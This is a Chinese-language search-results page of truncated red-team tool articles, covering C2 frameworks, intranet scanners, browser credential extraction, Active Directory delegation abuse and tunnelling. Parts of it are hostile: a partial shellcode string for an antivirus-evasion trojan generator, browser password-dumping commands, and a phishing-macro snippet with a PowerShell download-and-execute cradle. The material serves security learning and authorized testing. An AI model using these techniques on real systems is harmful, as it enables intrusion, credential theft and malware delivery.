首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏闪石星曜CyberSecurity

    工具使用】工具之Faction

    Faction是面向安全专业人员的C2框架,它提供了一种扩展代理并与代理进行交互的简便方法。它着重于通过有据可查的REST和Socket.IO API为C2通信提供一个简单,稳定和可访问的平台。

    1.4K10发布于 2020-07-27
  • 来自专栏潇湘信安

    RequestTemplate内网渗透工具

    RequestTemplate是一款两端并用的渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 蓝对抗中的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测 config.json配置 WEB扫描: 集成Xray三百多种POC检测 漏洞验证: 使用Java端配置代理对扫描结果进行复现验证截图 0x03 RequestTemplate客户端 root@VM-4- scan,for example: 192.168.11.11-255 or 192.168.1.1/24 or /22 /15... 0x04 RequestTemplate服务端 root@VM-4-

    1.7K30编辑于 2022-09-22
  • 来自专栏释然IT杂谈

    内网渗透工具(-甲方自查工具

    RequestTemplate是一款两端并用的渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 蓝对抗中的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测 config.json配置 WEB扫描: 集成Xray三百多种POC检测 漏洞验证: 使用Java端配置代理对扫描结果进行复现验证截图 0x03 RequestTemplate客户端 root@VM-4- scan,for example: 192.168.11.11-255 or 192.168.1.1/24 or /22 /15... 0x04 RequestTemplate服务端 root@VM-4-

    59120编辑于 2023-08-18
  • 来自专栏网络安全自修室

    2022必备工具列表总结​

    内容速览 一、信息收集 1、AppInfoScanner 一款适用于以HVV行动//渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师 、成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。 EHole 重点攻击系统指纹探测工具 https://github.com/EdgeSecurityTeam/EHole 二、漏洞扫描 1、Goby Goby是一款新的网络安全测试工具,它能够针对一个目标企业梳理最全的攻击面信息 https://github.com/DSO-Lab/pocscan 4、myscan myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc / 4、天眼查 https://tianyancha.com

    1.8K21编辑于 2022-12-06
  • 来自专栏潇湘信安

    专用免杀木马生成工具

    工具简介 一款专用免杀木马生成器,该工具可以通过人员提供的一段 shellcode 快速生成一个绕过所有杀软的可执行木马。 特点 基于Syscall进行免杀,且随机混淆,可过几乎所有杀软 内置go-strip对Go生成的木马进行编译信息抹除与程序信息混淆 工具本体只有1个exe,搭配Go环境即可直接使用 工具使用 下载二进制文件 ,并且在系统上安装Go语言环境,然后将shellcode保存到1个txt文件中,即可使用本工具生成免杀马。 C语言字符串格式 shellcode: "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52" "\x48\x31\xd2\x51\ x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31

    1.7K20编辑于 2023-03-21
  • 来自专栏Khan安全团队

    Tips

    在Windows上使用prtsc键时,taskhost/taskhostw会试图获得对一个不存在的文件的读取权限。

    33130编辑于 2022-04-02
  • 来自专栏网络安全攻防

    【神兵利器】内网高并发扫描工具

    项目介绍 ServerScan是款使用Golang开发且适用于攻防演习内网横向信息收集的高并发网络扫描、服务探测工具 工具使用 (1) 端口扫描 (2) 服务版本探测 (3) CobaltStrike结合

    21410编辑于 2024-12-20
  • 来自专栏Khan安全团队

    利器 - SharpSniper

    通常,参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。 SharpSniper 是一个简单的工具,可以找到这些用户的 IP 地址,以便您可以定位他们。

    34620编辑于 2022-07-13
  • 来自专栏网络安全攻防

    【神兵利器】内网主机信息探测工具

    项目介绍 SharpHostInfo是一款快速探测内网主机信息工具(深信服深蓝实验室天威战队强力驱动) 功能特性 c#编写,可内存执行,免杀友好。 小巧轻便,速度极快。 192.168.1.1/16,指定探测线程为200个,指定探测超时1000毫秒 SharpHostInfo.exe -s nbns,wmi -i 192.168.1.1/16 -t 200 -m 1000 免责声明 本工具仅面向合法授权的企业安全建设行为 ,例如企业内部攻防演练、漏洞验证和复测,如您需要测试本工具的可用性,请自行搭建靶机环境。 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标使用。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任

    25610编辑于 2024-12-20
  • 来自专栏网络安全攻防

    【神兵利器】浏览器凭据提取工具

    项目介绍 HackBrowserData是一个命令行工具,它主要用于从浏览器中解密和导出浏览器数据(密码、历史记录、cookies、书签、信用卡、下载历史记录、本地存储和扩展)。 Firefox ESR ✅ ✅ ✅ ✅ Firefox Nightly ✅ ✅ ✅ ✅ Safari ❌ ❌ ❌ ❌ 项目使用 在命令行中执行以下代码进行运行: PS C:\Users\moond4rk \hack-browser-data.exe -b all -f json --dir results --zip PS C:\Users\moond4rk\Desktop> ls -l . PS:用双引号把路径括起来 PS C:\Users\moond4rk\Desktop> . file results/chrome_password.csv success 免责声明 仅限用于技术研究和获得正式授权的攻防项目,请使用者遵守《中华人民共和国网络安全法》,切勿用于任何非法活动,若将工具做其他用途

    76510编辑于 2025-01-07
  • 来自专栏网络安全攻防

    【神兵利器】高性能隧道代理工具

    Chisel是一款使用Go (golang)写的高速TCP/UDP隧道,通过HTTP传输,通过SSH保护,包括客户端和服务器的单个可执行文件,Chisel主要用于穿越防火墙,但它也可以用于提供一个安全的网络端点。

    42710编辑于 2024-12-20
  • 来自专栏网络安全攻防

    【神兵利器】Active Directory侦察利用工具

    项目介绍 SharpADWS 是一个为 Red Teams 打造的 Active Directory 侦查和利用工具,其通过 Active Directory Web Services (ADWS) 协议收集并修改 查询并将其转发到运行在同一域控制器上的 LDAP 服务器 项目优点 使用 ADWS 进行 LDAP 后利用的主要好处之一是它相对不为人所知,由于 LDAP 流量不会通过网络发送,因此不容易被常见的监控工具检测到 Create:创建一个新的对象 工具使用 命令行参数-h可用于显示以下使用信息: C:\Users\Marcus>SharpADWS.exe -h SharpADWS 1.0.0-beta - Copyright [*] PENTEST$ can now impersonate users on DC01$ via S4U2Proxy [*] Accounts allowed to act on behalf of : CN=corp-DC01-CA, DC=corp, DC=local Certificate Serial Number : 2D975C2D49AE4BB7432682E1708C8834

    57500编辑于 2025-01-07
  • | 工具篇】资产信息收集工具—Kunyu(坤舆)安装教程

    0x00前言: 工具介绍 Kunyu(坤舆)的名字来源于地理信息相关的专业领域,它统计了海、陆、空的地理信息。同样的原理也适用于网络空间,包括发现未知和脆弱的资产。 ·根据相关要求进行蓝对抗,批量检查捕获的IP。 ·批量收集设备和终端内受影响的易受攻击资产(0day/1day)。 ·快速收集参与新型网络犯罪案件的站点信息,以便进行更高效的研究、判断和分析。 )进入该文件目录 cd Kunyu 3)安装依赖包 pip3 install -r requirements.txt 出现Successfully installed Faker-23.1.0 bs4- 第一次使用时,您需要使用ZoomEye的登录凭据来使用该工具收集信息。 总的来说工具用起来很方便,值得大家安装体验一下。

    32510编辑于 2025-10-23
  • 来自专栏渗透测试教程

    - 渗透小技巧

    /hxd/axgg.xml 5..git svn如果觉得还原的不全,可以去kali重新试试,多下几个工具 6.日志 其他信息收集 1.c段,旁站,fofa搜索icon,header。 4.遇到一个cms存在盲注,数据出的很慢,我们可以自己本地搭建一个,查看账号密码放在哪个表单。 4.看看有没有.user.ini这个文件,有的话走大运 5.白名单,这类没有解析漏洞或者开发商本身的漏洞,就别想着绕过了。 (4)权限维持 这一步和提权是一样的,我们应该明白什么时候需要权限维持,不是打点进去,一个pth上了三四太机器,然后每一个做一个自启,或者直接注册表修改添加隐藏用户,又或者激活guest。 /as.txt scrobj.dll"这样调用 (6)内网的一些小技巧 1.当某些软件正在运行或者权限不够我们看不了,我们可以copy到一个位置然后在type 2.如果某些环境出现中文名而且我们的c2工具因为字符不能识别无法正常渗透

    1.7K40发布于 2021-07-23
  • 来自专栏FreeBuf

    渗透必备工具与Linux主机上线

    *本工具仅供技术分享、交流讨论,严禁用于非法用途。 毕竟拿下蓝才是我们的终极目标。 工具下载 CobaltStrike4.3 链接: https://pan.baidu.com/s/1nj8vm6EKqWJ-O\_Ah7DAsRw 提取码:10px CrossC2 链接: https: 可利用此漏洞的Java版本为1.6.0_45以下及1.7.0 _21以下 System Profiler:客户端检测工具,可以用来获取一些系统信息,例如系统版本、浏览器版本、Flash版本等 1.3.3 这边举个栗子就好了,Powershell Command ,会生成一个文件,保存下来,用powershell执行,这边的原理大致就是生成可执行木马文件,执行后,主机上线,但是只能上线Windows主机 No.4

    1.8K30发布于 2021-08-24
  • 来自专栏网络安全

    Microsoft 发布 PyRIT - 生成式 AI 的工具

    这个工具旨在“使全球的每个组织都能够负责任地利用最新的人工智能进步进行创新”,微软的AI负责人Ram Shankar Siva Kumar说。 评分引擎还提供了两种不同的评分目标AI系统输出的选项,允许成员使用传统的机器学习分类器或利用LLM端点进行自我评估。 尽管如此,这家科技巨头谨慎地强调,PyRIT不是替代生成式AI系统的手动评估,而是补充现有的领域专业知识。 微软进一步承认,评估生成式AI系统需要同时探测安全和负责任的AI风险,而且这个过程更具概率性,同时也指出了生成式AI系统架构之间的广泛差异。 工具地址:https://github.com/Azure/PyRIT

    79410编辑于 2024-10-08
  • 来自专栏Khan安全团队

    笔记 - 横向移动

    此属性包含允许在其上使用的 SPN s4u2proxy,即基于现有 TGS(通常是使用 获得的s4u2self)为该服务器请求可转发 TGS 。这有效地定义了允许约束委派的后端服务。 如果s4u2proxy允许而没有s4u2self,则需要用户交互才能从用户那里获取到前端服务的有效 TGS,类似于无约束委派。 # Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN . 在这种情况下,s4u2self和s4u2proxy如上所述用于代表用户请求可转发票证。 例如,我们可以使用适用于 Windows的合法远程系统管理工具(RSAT) 来创建新的 GPO,将其链接到目标,并部署注册表 runkey 以添加将在机器下次启动时自动运行的命令。

    2.4K10发布于 2021-10-12
  • 来自专栏HACK学习

    | Windows命名管道

    而大于win2003的机器,默认是关闭了所有的可匿名访问的命名管道,所有用这些工具打win2003之后的系统会提示找不到Named Pipe。 ?

    2.5K20发布于 2021-06-24
  • 来自专栏HACK学习

    | InlineHook技术实现

    ; DWORD ESP; DWORD ESI; DWORD EDI; }regeist; regeist reg = { 0 }; 然后第22~28行的值由于pushad和pushfd了,偏移不能是+4 y + z; } 测试 DWORD TestInlineHook() { PAddr = (BYTE*)Test + 1; PAddr += *(DWORD*)PAddr+ 4; ) { return x + y + z; } DWORD TestInlineHook() { PAddr = (BYTE*)Test + 1; PAddr += *(DWORD*)PAddr + 4;

    78740发布于 2021-05-14
  • 来自专栏Gamma安全实验室

    技巧-网络钓鱼

    前言 涵盖了现在大多数钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜! 1. excel宏执行任意命令 新建一个exel表,然后打开,对准这个右键点击插入宏。 ? cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a IEX (New-ObjectNet.WebClient) 文件是可以执行js代码的,那么就可以配合jsbackdoor 来进行权限获取,这里推荐一个项目: https://github.com/Ridter/MyJSRat 一个py版本的JSbackdoor 4. 为什么会设置成790x1120嘞,只是为了刚好覆盖word里面的文本,然后docx文档另存为doc文档 然后打开,去开启显示开发者工具选项卡,文件->选项->自定义功能区->主选项卡->开发者工具 ? 然后点击开发者工具,选择图像(Active控件) ? 设置图像格式为浮于文字上方,并把图像拉满 ? 效果就是这样,会把文字全部覆盖 ?

    3.3K10发布于 2021-03-10
领券